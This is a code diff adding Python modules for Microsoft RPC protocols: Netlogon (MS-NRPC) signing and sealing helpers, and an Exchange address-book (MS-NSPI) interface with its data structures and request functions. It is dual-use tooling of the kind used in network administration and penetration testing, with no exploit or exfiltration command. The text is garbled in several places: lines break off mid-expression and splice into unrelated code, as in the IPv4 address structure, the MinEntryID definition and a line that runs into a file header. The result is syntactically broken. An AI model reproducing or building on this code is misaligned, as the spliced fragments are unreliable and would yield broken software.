+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
+ item = RPC_UNICODE_STRING
+
+class NL_SITE_NAME_EX_ARRAY(NDRSTRUCT):
+ structure = (
+ ('EntryCount', ULONG),
+ ('SiteNames', PRPC_UNICODE_STRING_ARRAY),
+ ('SubnetNames', PRPC_UNICODE_STRING_ARRAY),
+ )
+
+class PNL_SITE_NAME_EX_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', NL_SITE_NAME_EX_ARRAY),
+ )
+
+# 2.2.1.2.4 NL_SOCKET_ADDRESS
+# 2.2.1.2.4.1 IPv4 Address Structure
+class IPv4Address(Structure):
+ structure = (
+ ('AddressFamily', '> 32) & 0xffffffff
+ sequenceHigh |= 0x80000000
+
+ res = pack('>L', sequenceLow)
+ res += pack('>L', sequenceHigh)
+ return res
+
+def ComputeNetlogonSignatureAES(authSignature, message, confounder, sessionKey):
+ # [MS-NRPC] Section 3.3.4.2.1, point 7
+ hm = hmac.new(key=sessionKey, digestmod=hashlib.sha256)
+ hm.update(authSignature.getData()[:8])
+ # If no confidentiality requested, it should be ''
+ hm.update(confounder)
+ hm.update(bytes(message))
+ return hm.digest()[:8]+'\x00'*24
+
+def ComputeNetlogonSignatureMD5(authSignature, message, confounder, sessionKey):
+ # [MS-NRPC] Section 3.3.4.2.1, point 7
+ md5 = hashlib.new('md5')
+ md5.update(b'\x00'*4)
+ md5.update(authSignature.getData()[:8])
+ # If no confidentiality requested, it should be ''
+ md5.update(confounder)
+ md5.update(bytes(message))
+ finalMD5 = md5.digest()
+ hm = hmac.new(sessionKey, digestmod=hashlib.md5)
+ hm.update(finalMD5)
+ return hm.digest()[:8]
+
+def encryptSequenceNumberRC4(sequenceNum, checkSum, sessionKey):
+ # [MS-NRPC] Section 3.3.4.2.1, point 9
+
+ hm = hmac.new(sessionKey, digestmod=hashlib.md5)
+ hm.update(b'\x00'*4)
+ hm2 = hmac.new(hm.digest(), digestmod=hashlib.md5)
+ hm2.update(checkSum)
+ encryptionKey = hm2.digest()
+
+ cipher = ARC4.new(encryptionKey)
+ return cipher.encrypt(sequenceNum)
+
+def decryptSequenceNumberRC4(sequenceNum, checkSum, sessionKey):
+ # [MS-NRPC] Section 3.3.4.2.2, point 5
+
+ return encryptSequenceNumberRC4(sequenceNum, checkSum, sessionKey)
+
+def encryptSequenceNumberAES(sequenceNum, checkSum, sessionKey):
+ # [MS-NRPC] Section 3.3.4.2.1, point 9
+ IV = checkSum[:8] + checkSum[:8]
+ Cipher = AES.new(sessionKey, AES.MODE_CFB, IV)
+ return Cipher.encrypt(sequenceNum)
+
+def decryptSequenceNumberAES(sequenceNum, checkSum, sessionKey):
+ # [MS-NRPC] Section 3.3.4.2.1, point 9
+ IV = checkSum[:8] + checkSum[:8]
+ Cipher = AES.new(sessionKey, AES.MODE_CFB, IV)
+ return Cipher.decrypt(sequenceNum)
+
+def SIGN(data, confounder, sequenceNum, key, aes = False):
+ if aes is False:
+ signature = NL_AUTH_SIGNATURE()
+ signature['SignatureAlgorithm'] = NL_SIGNATURE_HMAC_MD5
+ if confounder == '':
+ signature['SealAlgorithm'] = NL_SEAL_NOT_ENCRYPTED
+ else:
+ signature['SealAlgorithm'] = NL_SEAL_RC4
+ signature['Checksum'] = ComputeNetlogonSignatureMD5(signature, data, confounder, key)
+ signature['SequenceNumber'] = encryptSequenceNumberRC4(deriveSequenceNumber(sequenceNum), signature['Checksum'], key)
+ return signature
+ else:
+ signature = NL_AUTH_SIGNATURE()
+ signature['SignatureAlgorithm'] = NL_SIGNATURE_HMAC_SHA256
+ if confounder == '':
+ signature['SealAlgorithm'] = NL_SEAL_NOT_ENCRYPTED
+ else:
+ signature['SealAlgorithm'] = NL_SEAL_AES128
+ signature['Checksum'] = ComputeNetlogonSignatureAES(signature, data, confounder, key)
+ signature['SequenceNumber'] = encryptSequenceNumberAES(deriveSequenceNumber(sequenceNum), signature['Checksum'], key)
+ return signature
+
+def SEAL(data, confounder, sequenceNum, key, aes = False):
+ signature = SIGN(data, confounder, sequenceNum, key, aes)
+ sequenceNum = deriveSequenceNumber(sequenceNum)
+
+ XorKey = bytearray(key)
+ for i in range(len(XorKey)):
+ XorKey[i] = XorKey[i] ^ 0xf0
+
+ XorKey = bytes(XorKey)
+
+ if aes is False:
+ hm = hmac.new(XorKey, digestmod=hashlib.md5)
+ hm.update(b'\x00'*4)
+ hm2 = hmac.new(hm.digest(), digestmod=hashlib.md5)
+ hm2.update(sequenceNum)
+ encryptionKey = hm2.digest()
+
+ cipher = ARC4.new(encryptionKey)
+ cfounder = cipher.encrypt(confounder)
+ cipher = ARC4.new(encryptionKey)
+ encrypted = cipher.encrypt(data)
+
+ signature['Confounder'] = cfounder
+
+ return encrypted, signature
+ else:
+ IV = sequenceNum + sequenceNum
+ cipher = AES.new(XorKey, AES.MODE_CFB, IV)
+ cfounder = cipher.encrypt(confounder)
+ encrypted = cipher.encrypt(data)
+
+ signature['Confounder'] = cfounder
+
+ return encrypted, signature
+
+def UNSEAL(data, auth_data, key, aes = False):
+ auth_data = NL_AUTH_SIGNATURE(auth_data)
+ XorKey = bytearray(key)
+ for i in range(len(XorKey)):
+ XorKey[i] = XorKey[i] ^ 0xf0
+
+ XorKey = bytes(XorKey)
+
+ if aes is False:
+ sequenceNum = decryptSequenceNumberRC4(auth_data['SequenceNumber'], auth_data['Checksum'], key)
+ hm = hmac.new(XorKey, digestmod=hashlib.md5)
+ hm.update(b'\x00'*4)
+ hm2 = hmac.new(hm.digest(), digestmod=hashlib.md5)
+ hm2.update(sequenceNum)
+ encryptionKey = hm2.digest()
+
+ cipher = ARC4.new(encryptionKey)
+ cfounder = cipher.encrypt(auth_data['Confounder'])
+ cipher = ARC4.new(encryptionKey)
+ plain = cipher.encrypt(data)
+
+ return plain, cfounder
+ else:
+ sequenceNum = decryptSequenceNumberAES(auth_data['SequenceNumber'], auth_data['Checksum'], key)
+ IV = sequenceNum + sequenceNum
+ cipher = AES.new(XorKey, AES.MODE_CFB, IV)
+ cfounder = cipher.decrypt(auth_data['Confounder'])
+ plain = cipher.decrypt(data)
+ return plain, cfounder
+
+
+def getSSPType1(workstation='', domain='', signingRequired=False):
+ auth = NL_AUTH_MESSAGE()
+ auth['Flags'] = 0
+ auth['Buffer'] = b''
+ auth['Flags'] |= NL_AUTH_MESSAGE_NETBIOS_DOMAIN
+ if domain != '':
+ auth['Buffer'] = auth['Buffer'] + b(domain) + b'\x00'
+ else:
+ auth['Buffer'] += b'WORKGROUP\x00'
+
+ auth['Flags'] |= NL_AUTH_MESSAGE_NETBIOS_HOST
+
+ if workstation != '':
+ auth['Buffer'] = auth['Buffer'] + b(workstation) + b'\x00'
+ else:
+ auth['Buffer'] += b'MYHOST\x00'
+
+ auth['Flags'] |= NL_AUTH_MESSAGE_NETBIOS_HOST_UTF8
+
+ if workstation != '':
+ auth['Buffer'] += pack(' / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Tested for MS-OXNSPI, some operation may not work for MS-NSPI
+#
+# ToDo:
+# [ ] Test commented NDRCALLs and write helpers for them
+# [ ] Test restriction structures
+
+from __future__ import division
+from __future__ import print_function
+from struct import unpack
+from datetime import datetime
+from six import PY2
+import binascii
+
+from impacket import hresult_errors, mapi_constants, uuid
+from impacket.uuid import EMPTY_UUID
+from impacket.structure import Structure
+from impacket.dcerpc.v5.dtypes import NULL, STR, DWORD, LPDWORD, UUID, PUUID, LONG, ULONG, \
+ FILETIME, PFILETIME, BYTE, SHORT, LPSTR, LPWSTR, USHORT, LPLONG, DWORD_ARRAY
+from impacket.ldap.ldaptypes import LDAP_SID
+from impacket.dcerpc.v5.ndr import NDR, NDRCALL, NDRPOINTER, NDRSTRUCT, NDRUNION, \
+ NDRUniConformantVaryingArray, NDRUniConformantArray, NDRUniVaryingArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import string_to_bin, uuidtup_to_bin, EMPTY_UUID
+
+MSRPC_UUID_NSPI = uuidtup_to_bin(('F5CC5A18-4264-101A-8C59-08002B2F8426', '56.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __str__( self ):
+ key = self.error_code
+ if key in mapi_constants.ERROR_MESSAGES:
+ error_msg_short = mapi_constants.ERROR_MESSAGES[key]
+ return 'NSPI SessionError: code: 0x%x - %s' % (self.error_code, error_msg_short)
+ elif key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'NSPI SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'NSPI SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# STRUCTURES
+################################################################################
+class handle_t(NDRSTRUCT):
+ structure = (
+ ('context_handle_attributes',ULONG),
+ ('context_handle_uuid',UUID),
+ )
+
+ def __init__(self, data=None, isNDR64=False):
+ NDRSTRUCT.__init__(self, data, isNDR64)
+ self['context_handle_uuid'] = b'\x00'*16
+
+ def isNull(self):
+ return self['context_handle_uuid'] == b'\x00'*16
+
+# 2.2.1 Permitted Property Type Values
+PtypEmbeddedTable = 0x0000000D
+PtypNull = 0x00000001
+PtypUnspecified = 0x00000000
+
+# 2.2.3 Display Type Values
+DT_MAILUSER = 0x00000000
+DT_DISTLIST = 0x00000001
+DT_FORUM = 0x00000002
+DT_AGENT = 0x00000003
+DT_ORGANIZATION = 0x00000004
+DT_PRIVATE_DISTLIST = 0x00000005
+DT_REMOTE_MAILUSER = 0x00000006
+DT_CONTAINER = 0x00000100
+DT_TEMPLATE = 0x00000101
+DT_ADDRESS_TEMPLATE = 0x00000102
+DT_SEARCH = 0x00000200
+
+# 2.2.4 Default Language Code Identifier
+NSPI_DEFAULT_LOCALE = 0x00000409
+
+# 2.2.5 Required Codepages
+CP_TELETEX = 0x00004F25
+CP_WINUNICODE = 0x000004B0
+
+# 2.2.6.1 Comparison Flags
+NORM_IGNORECASE = 1 << 0
+NORM_IGNORENONSPACE = 1 << 1
+NORM_IGNORESYMBOLS = 1 << 2
+SORT_STRINGSORT = 1 << 12
+NORM_IGNOREKANATYPE = 1 << 16
+NORM_IGNOREWIDTH = 1 << 17
+
+# 2.2.7 Permanent Entry ID GUID
+GUID_NSPI = string_to_bin("C840A7DC-42C0-1A10-B4B9-08002B2FE182")
+
+# 2.2.8 Positioning Minimal Entry IDs
+MID_BEGINNING_OF_TABLE = 0x00000000
+MID_END_OF_TABLE = 0x00000002
+MID_CURRENT = 0x00000001
+
+# 2.2.9 Ambiguous Name Resolution Minimal Entry IDs
+MID_UNRESOLVED = 0x00000000
+MID_AMBIGUOUS = 0x00000001
+MID_RESOLVED = 0x00000002
+
+# 2.2.10 Table Sort Orders
+SortTypeDisplayName = 0
+SortTypePhoneticDisplayName = 0x00000003
+SortTypeDisplayName_RO = 0x000003E8
+SortTypeDisplayName_W = 0x000003E9
+
+# 2.2.11 NspiBind Flags
+fAnonymousLogin = 0x00000020
+
+# 2.2.12 Retrieve Property Flags
+fSkipObjects = 0x00000001
+fEphID = 0x00000002
+
+# 2.2.13 NspiGetSpecialTable Flags
+NspiAddressCreationTemplates = 0x00000002
+NspiUnicodeStrings = 0x00000004
+
+# 2.2.14 NspiQueryColumns Flags
+NspiUnicodeProptypes = 0x80000000
+
+# 2.2.15 NspiGetIDsFromNames Flags
+NspiVerifyNames = 0x00000002
+
+# 2.2.16 NspiGetTemplateInfo Flags
+TI_TEMPLATE = 0x00000001
+TI_SCRIPT = 0x00000004
+TI_EMT = 0x00000010
+TI_HELPFILE_NAME = 0x00000020
+TI_HELPFILE_CONTENTS = 0x00000040
+
+# 2.2.17 NspiModLinkAtt Flags
+fDelete = 0x00000001
+
+# 2.3.1.1 FlatUID_r
+FlatUID_r = UUID
+PFlatUID_r = PUUID
+
+# 2.3.1.2 PropertyTagArray_r
+class PropertyTagArray(NDRUniConformantVaryingArray):
+ item = DWORD
+
+class PropertyTagArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', ULONG),
+ ('aulPropTag', PropertyTagArray)
+ )
+
+class PPropertyTagArray_r(NDRPOINTER):
+ referent = (
+ ('Data', PropertyTagArray_r),
+ )
+
+# 2.3.1.3 Binary_r
+class Binary(NDRUniConformantArray):
+ item = 'c'
+
+class PBinary(NDRPOINTER):
+ referent = (
+ ('Data', Binary),
+ )
+
+class Binary_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lpb', PBinary),
+ )
+
+# 2.3.1.4 ShortArray_r
+class ShortArray(NDRUniConformantArray):
+ item = SHORT
+
+class PShortArray(NDRPOINTER):
+ referent = (
+ ('Data', ShortArray),
+ )
+
+class ShortArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lpi', PShortArray),
+ )
+
+# 2.3.1.5 LongArray_r
+class LongArray(NDRUniConformantArray):
+ item = LONG
+
+class PLongArray(NDRPOINTER):
+ referent = (
+ ('Data', LongArray),
+ )
+
+class LongArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lpl', PLongArray)
+ )
+
+# 2.3.1.6 StringArray_r
+class StringArray(NDRUniConformantArray):
+ item = LPSTR
+
+class PStringArray(NDRPOINTER):
+ referent = (
+ ('Data', StringArray),
+ )
+
+class StringArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lppszA', PStringArray)
+ )
+
+# 2.3.1.7 BinaryArray_r
+class BinaryArray(NDRUniConformantArray):
+ item = Binary_r
+
+class PBinaryArray(NDRPOINTER):
+ referent = (
+ ('Data', BinaryArray),
+ )
+
+class BinaryArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lpbin', PBinaryArray)
+ )
+
+# 2.3.1.8 FlatUIDArray_r
+class FlatUIDArray(NDRUniConformantArray):
+ item = PFlatUID_r
+
+class PFlatUIDArray(NDRPOINTER):
+ referent = (
+ ('Data', FlatUIDArray),
+ )
+
+class FlatUIDArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lpguid', PFlatUIDArray)
+ )
+
+# 2.3.1.9 WStringArray_r
+class WStringArray(NDRUniConformantArray):
+ item = LPWSTR
+
+class PWStringArray(NDRPOINTER):
+ referent = (
+ ('Data', WStringArray),
+ )
+
+class WStringArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lppszW', PWStringArray)
+ )
+
+# 2.3.1.10 DateTimeArray_r
+class DateTimeArray(NDRUniConformantArray):
+ item = PFILETIME
+
+class PDateTimeArray(NDRPOINTER):
+ referent = (
+ ('Data', DateTimeArray),
+ )
+
+class DateTimeArray_r(NDRSTRUCT):
+ structure = (
+ ('cValues', DWORD),
+ ('lpft', PDateTimeArray)
+ )
+
+# 2.3.1.11 PROP_VAL_UNION
+class PROP_VAL_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', DWORD),
+ )
+
+ union = {
+ 0x0002: ('i', SHORT), # PtypInteger16
+ 0x0003: ('l', LONG), # PtypInteger32
+ 0x000B: ('b', USHORT), # PtypBoolean
+ 0x001E: ('lpszA', LPSTR), # PtypString8
+ 0x0102: ('bin', Binary_r), # PtypBinary
+ 0x001F: ('lpszW', LPWSTR), # PtypString
+ 0x0048: ('lpguid', PFlatUID_r), # PtypGuid
+ 0x0040: ('ft', FILETIME), # PtypTime
+ 0x000A: ('err', ULONG), # PtypErrorCode
+ 0x1002: ('MVi', ShortArray_r), # PtypMultipleInteger16
+ 0x1003: ('MVl', LongArray_r), # PtypMultipleInteger32
+ 0x101E: ('MVszA', StringArray_r), # PtypMultipleString8
+ 0x1102: ('MVbin', BinaryArray_r), # PtypMultipleBinary
+ 0x1048: ('MVguid', FlatUIDArray_r), # PtypMultipleGuid
+ 0x101F: ('MVszW', WStringArray_r), # PtypMultipleString
+ 0x1040: ('MVft', DateTimeArray_r), # PtypMultipleTime
+ 0x0001: ('lReserved', LONG), # PtypNull
+ 0x000D: ('lReserved', LONG), # PtypEmbeddedTable
+ 0x0000: ('lReserved', LONG), # PtypUnspecified
+ }
+
+# 2.3.1.12 PropertyValue_r
+class PropertyValue_r(NDRSTRUCT):
+ structure = (
+ ('ulPropTag', DWORD),
+ ('ulReserved', DWORD), # dwAlignPad
+ ('Value', PROP_VAL_UNION),
+ )
+
+class PPropertyValue_r(NDRPOINTER):
+ referent = (
+ ('Data', PropertyValue_r),
+ )
+
+# 2.3.2 PropertyRow_r
+class PropertyValue(NDRUniConformantArray):
+ item = PropertyValue_r
+
+class PPropertyValue(NDRPOINTER):
+ referent = (
+ ('Data', PropertyValue),
+ )
+
+class PropertyRow_r(NDRSTRUCT):
+ structure = (
+ ('Reserved', DWORD), # ulAdrEntryPad
+ ('cValues', DWORD),
+ ('lpProps', PPropertyValue)
+ )
+
+class PPropertyRow_r(NDRPOINTER):
+ referent = (
+ ('Data', PropertyRow_r),
+ )
+
+# 2.3.3 PropertyRowSet_r
+class PropertyRowSet(NDRUniConformantArray):
+ item = PropertyRow_r
+
+class PropertyRowSet_r(NDRSTRUCT):
+ structure = (
+ ('cRows', DWORD),
+ ('aRow', PropertyRowSet),
+ )
+
+class PPropertyRowSet_r(NDRPOINTER):
+ referent = (
+ ('Data', PropertyRowSet_r),
+ )
+
+# 2.3.4 Restrictions
+class Restriction_r(NDRSTRUCT):
+ pass
+
+class PRestriction_r(NDRPOINTER):
+ referent = (
+ ('Data', Restriction_r),
+ )
+
+# 2.3.4.1 AndRestriction_r, OrRestriction_r
+class AndRestriction(NDRUniConformantArray):
+ item = Restriction_r
+
+class PAndRestriction(NDRPOINTER):
+ referent = (
+ ('Data', AndRestriction),
+ )
+
+class AndRestriction_r(NDRSTRUCT):
+ structure = (
+ ('cRes', DWORD),
+ ('lpRes', PAndRestriction),
+ )
+
+OrRestriction_r = AndRestriction_r
+
+# 2.3.4.2 NotRestriction_r
+class NotRestriction_r(NDRSTRUCT):
+ structure = (
+ ('lpRes', PRestriction_r),
+ )
+
+# 2.3.4.3 ContentRestriction_r
+class ContentRestriction_r(NDRSTRUCT):
+ structure = (
+ ('ulFuzzyLevel', DWORD),
+ ('ulPropTag', DWORD),
+ ('lpProp', PPropertyValue_r),
+ )
+
+# 2.3.4.4 BitMaskRestriction_r
+class BitMaskRestriction_r(NDRSTRUCT):
+ structure = (
+ ('relBMR', DWORD),
+ ('ulPropTag', DWORD),
+ ('ulMask', DWORD),
+ )
+
+# 2.3.4.5 PropertyRestriction_r
+class PropertyRestriction_r(NDRSTRUCT):
+ structure = (
+ ('relop', DWORD),
+ ('ulPropTag', DWORD),
+ ('lpProp', PPropertyValue_r),
+ )
+
+# 2.3.4.6 ComparePropsRestriction_r
+class ComparePropsRestriction_r(NDRSTRUCT):
+ structure = (
+ ('relop', DWORD),
+ ('ulPropTag1', DWORD),
+ ('ulPropTag2', DWORD),
+ )
+
+# 2.3.4.7 SubRestriction_r
+class SubRestriction_r(NDRSTRUCT):
+ structure = (
+ ('ulSubObject', DWORD),
+ ('lpRes', PRestriction_r),
+ )
+
+# 2.3.4.8 SizeRestriction_r
+class SizeRestriction_r(NDRSTRUCT):
+ structure = (
+ ('relop', DWORD),
+ ('ulPropTag', DWORD),
+ ('cb', DWORD),
+ )
+
+# 2.3.4.9 ExistRestriction_r
+class ExistRestriction_r(NDRSTRUCT):
+ structure = (
+ ('ulReserved1', DWORD),
+ ('ulPropTag', DWORD),
+ ('ulReserved2', DWORD),
+ )
+
+# 2.3.4.10 RestrictionUnion_r
+class RestrictionUnion_r(NDRUNION):
+ commonHdr = (
+ ('tag', DWORD),
+ )
+
+ union = {
+ 0x00000000: ('resAnd', AndRestriction_r),
+ 0x00000001: ('resOr', OrRestriction_r),
+ 0x00000002: ('resNot', NotRestriction_r),
+ 0x00000003: ('resContent', ContentRestriction_r),
+ 0x00000004: ('resProperty', PropertyRestriction_r),
+ 0x00000005: ('resCompareProps', ComparePropsRestriction_r),
+ 0x00000006: ('resBitMask', BitMaskRestriction_r),
+ 0x00000007: ('resSize', SizeRestriction_r),
+ 0x00000008: ('resExist', ExistRestriction_r),
+ 0x00000009: ('resSubRestriction', SubRestriction_r),
+ }
+
+# 2.3.4.11 Restriction_r
+Restriction_r.structure = (
+ ('rt', DWORD),
+ ('res', RestrictionUnion_r),
+)
+
+# 2.3.5.1 PropertyName_r
+class PropertyName_r(NDRSTRUCT):
+ structure = (
+ ('lpguid', PFlatUID_r),
+ ('ulReserved', DWORD),
+ ('lID', LONG),
+ )
+
+class PPropertyName_r(NDRPOINTER):
+ referent = (
+ ('Data', PropertyName_r),
+ )
+
+# 2.3.5.2 PropertyNameSet_r
+class PropertyNameSet(NDRUniConformantArray):
+ item = PropertyName_r
+
+class PropertyNameSet_r(NDRSTRUCT):
+ structure = (
+ ('cNames', DWORD),
+ ('aulPropTag', PropertyNameSet)
+ )
+
+class PPropertyNameSet_r(NDRPOINTER):
+ referent = (
+ ('Data', PropertyNameSet_r),
+ )
+
+# 2.3.6.1 StringsArray_r
+class StringsArray(NDRUniConformantArray):
+ item = LPSTR
+
+class StringsArray_r(NDRSTRUCT):
+ structure = (
+ ('Count', DWORD),
+ ('Strings', StringsArray)
+ )
+
+# 2.3.6.1 StringsArray_r
+class WStringsArray(NDRUniConformantArray):
+ item = LPWSTR
+
+class WStringsArray_r(NDRSTRUCT):
+ structure = (
+ ('Count', DWORD),
+ ('Strings', WStringsArray)
+ )
+
+# 2.3.7 STAT
+class STAT(NDRSTRUCT):
+ structure = (
+ ('SortType', DWORD),
+ ('ContainerID', DWORD),
+ ('CurrentRec', DWORD),
+ ('Delta', LONG),
+ ('NumPos', DWORD),
+ ('TotalRecs', DWORD),
+ ('CodePage', DWORD),
+ ('TemplateLocale', DWORD),
+ ('SortLocale', DWORD),
+ )
+
+class PSTAT(NDRPOINTER):
+ referent = (
+ ('Data', STAT),
+ )
+
+# 2.3.8.1 MinimalEntryID
+MinEntryID = ' 0:
+ for aulPropTag in pPropTags:
+ prop = DWORD()
+ prop['Data'] = aulPropTag
+ request['pPropTags']['aulPropTag'].append(prop)
+ request['pPropTags']['cValues'] = len(pPropTags)
+ request.fields['pPropTags'].fields['Data'].fields['aulPropTag'].fields['MaximumCount'] = len(pPropTags) + 1
+ else:
+ request['pPropTags'] = pPropTagsRaw
+
+ if len(lpETable) > 0:
+ for mID in lpETable:
+ elem = DWORD()
+ elem['Data'] = mID
+ request['lpETable'].append(elem)
+ request['dwETableCount'] = len(lpETable)
+ else:
+ request['lpETable'] = NULL
+ request['dwETableCount'] = 0
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiSeekEntries(dce, handler, displayName, ContainerID=0, SortType=0, \
+ lpETable=[], lpETableRaw=NULL, pPropTags=[], pPropTagsRaw=NULL):
+ request = NspiSeekEntries()
+ request['hRpc'] = handler
+ request['pStat']['ContainerID'] = ContainerID
+
+ # MS-OXNSPI 3.1.4.1.9.9
+ # If the SortType field in the input parameter pStat has any value other than
+ # SortTypeDisplayName, the server MUST return the value GeneralFailure.
+ request['pStat']['SortType'] = SortTypeDisplayName
+
+ # MS-OXNSPI 3.1.4.1.9.10
+ # If the SortType field in the input parameter pStat is SortTypeDisplayName and the property
+ # specified in the input parameter pTarget is anything other than PidTagDisplayName (with either
+ # the Property Type PtypString8 or PtypString), the server MUST return the value
+ # GeneralFailure.
+ request['pTarget']['ulPropTag'] = 0x3001001F
+ request['pTarget']['Value']['tag'] = 0x0000001F
+ request['pTarget']['Value']['lpszW'] = checkNullString(displayName)
+
+ if len(lpETable) > 0:
+ for mID in lpETable:
+ elem = DWORD()
+ elem['Data'] = mID
+ request['lpETable'].append(elem)
+ else:
+ request['lpETable'] = lpETableRaw
+
+ if len(pPropTags) > 0:
+ for aulPropTag in pPropTags:
+ prop = DWORD()
+ prop['Data'] = aulPropTag
+ request['pPropTags']['aulPropTag'].append(prop)
+ request.fields['pPropTags'].fields['aulPropTag'].fields['MaximumCount'] = len(pPropTags) + 1
+ else:
+ request['pPropTags'] = pPropTagsRaw
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiDNToMId(dce, handler, pNames=[]):
+ request = NspiDNToMId()
+ request['hRpc'] = handler
+ request['pNames']['Count'] = len(pNames)
+
+ for name in pNames:
+ lpstr = LPSTR()
+ lpstr['Data'] = checkNullString(name)
+ request['pNames']['Strings'].append(lpstr)
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiGetPropList(dce, handler, dwMId=0, dwFlags=fSkipObjects, CodePage=CP_TELETEX):
+ request = NspiGetPropList()
+ request['hRpc'] = handler
+ request['dwMId'] = dwMId
+ request['dwFlags'] = dwFlags
+ request['CodePage'] = CodePage
+ resp = dce.request(request)
+
+ return resp
+
+def hNspiGetProps(dce, handler, ContainerID=0, CurrentRec=0, dwFlags=fSkipObjects, CodePage=CP_TELETEX, pPropTags=[]):
+ request = NspiGetProps()
+ request['hRpc'] = handler
+ request['dwFlags'] = dwFlags
+
+ request['pStat']['CurrentRec'] = CurrentRec
+ request['pStat']['ContainerID'] = ContainerID
+ request['pStat']['CodePage'] = CodePage
+
+ for aulPropTag in pPropTags:
+ prop = DWORD()
+ prop['Data'] = aulPropTag
+ request['pPropTags']['aulPropTag'].append(prop)
+ request['pPropTags']['cValues'] = len(pPropTags) + 1
+ request.fields['pPropTags'].fields['Data'].fields['aulPropTag'].fields['MaximumCount'] = len(pPropTags) + 1
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiGetSpecialTable(dce, handler, dwFlags=NspiUnicodeStrings, pStat=STAT(), lpVersion=NULL):
+ request = NspiGetSpecialTable()
+ request['hRpc'] = handler
+ request['dwFlags'] = dwFlags
+ request['pStat'] = pStat
+ request['lpVersion'] = lpVersion
+
+ resp = dce.request(request)
+ return resp
+
+# Lookups specified LegacyDN or CN={ulType},CN={dwLocaleID},CN=Display-Templates,CN=Addressing in Configuration Naming Context
+def hNspiGetTemplateInfo(dce, handler, pDN=NULL, dwLocaleID=0, ulType=0, dwCodePage=0, dwFlags=0xFFFFFFFF):
+ request = NspiGetTemplateInfo()
+ request['hRpc'] = handler
+ request['dwFlags'] = dwFlags
+ request['ulType'] = ulType
+ request['pDN'] = checkNullString(pDN)
+ request['dwCodePage'] = dwCodePage
+ request['dwLocaleID'] = dwLocaleID
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiModLinkAtt(dce, handler, dwFlags, ulPropTag, dwMId, lpEntryIds):
+ request = NspiModLinkAtt()
+ request['hRpc'] = handler
+ request['dwFlags'] = dwFlags
+ request['ulPropTag'] = ulPropTag
+ request['dwMId'] = dwMId
+
+ for lpEntryId in lpEntryIds:
+ prop = Binary_r()
+ prop['lpb'] = lpEntryId.getData()
+ prop['cValues'] = len(prop['lpb'])
+ request['lpEntryIds']['lpbin'].append(prop)
+ request['lpEntryIds']['cValues'] = len(lpEntryIds)
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiQueryColumns(dce, handler, dwFlags=NspiUnicodeProptypes):
+ request = NspiQueryColumns()
+ request['hRpc'] = handler
+ request['dwFlags'] = dwFlags
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiGetNamesFromIDs(dce, handler, lpguid=EMPTY_UUID, pPropTags=[], pPropTagsRaw=NULL):
+ request = NspiGetNamesFromIDs()
+ request['hRpc'] = handler
+ request['lpguid'] = lpguid
+
+ if len(pPropTags) > 0:
+ for aulPropTag in pPropTags:
+ prop = DWORD()
+ prop['Data'] = aulPropTag
+ request['pPropTags']['aulPropTag'].append(prop)
+ request['pPropTags']['cValues'] = len(pPropTags)
+ request.fields['pPropTags'].fields['Data'].fields['aulPropTag'].fields['MaximumCount'] = len(pPropTags) + 1
+ elif pPropTagsRaw == NULL:
+ request.fields['pPropTags'] = NULL
+ else:
+ request['pPropTags'] = pPropTagsRaw
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiResolveNames(dce, handler, ContainerID=0, pPropTags=[], pPropTagsRaw=NULL, paStr=[]):
+ request = NspiResolveNames()
+ request['hRpc'] = handler
+ request['pStat']['ContainerID'] = ContainerID
+
+ if len(pPropTags) > 0:
+ for aulPropTag in pPropTags:
+ prop = DWORD()
+ prop['Data'] = aulPropTag
+ request['pPropTags']['aulPropTag'].append(prop)
+ request['pPropTags']['cValues'] = len(pPropTags)
+ request.fields['pPropTags'].fields['Data'].fields['aulPropTag'].fields['MaximumCount'] = len(pPropTags) + 1
+ elif pPropTagsRaw == NULL:
+ request.fields['pPropTags'] = NULL
+ else:
+ request['pPropTags'] = pPropTagsRaw
+
+ if len(paStr) > 0:
+ for paStrElem in paStr:
+ value = LPSTR()
+ value['Data'] = checkNullString(paStrElem)
+ request['paStr']['Strings'].append(value)
+ request['paStr']['Count'] = len(paStr)
+
+ resp = dce.request(request)
+ return resp
+
+def hNspiResolveNamesW(dce, handler, ContainerID=0, pPropTags=[], pPropTagsRaw=NULL, paStr=[]):
+ request = NspiResolveNamesW()
+ request['hRpc'] = handler
+ request['pStat']['ContainerID'] = ContainerID
+
+ if len(pPropTags) > 0:
+ for aulPropTag in pPropTags:
+ prop = DWORD()
+ prop['Data'] = aulPropTag
+ request['pPropTags']['aulPropTag'].append(prop)
+ request['pPropTags']['cValues'] = len(pPropTags)
+ request.fields['pPropTags'].fields['Data'].fields['aulPropTag'].fields['MaximumCount'] = len(pPropTags) + 1
+ elif pPropTagsRaw == NULL:
+ request.fields['pPropTags'] = NULL
+ else:
+ request['pPropTags'] = pPropTagsRaw
+
+ if len(paStr) > 0:
+ for paStrElem in paStr:
+ value = LPWSTR()
+ value['Data'] = checkNullString(paStrElem)
+ request['paStr']['Strings'].append(value)
+ request['paStr']['Count'] = len(paStr)
+
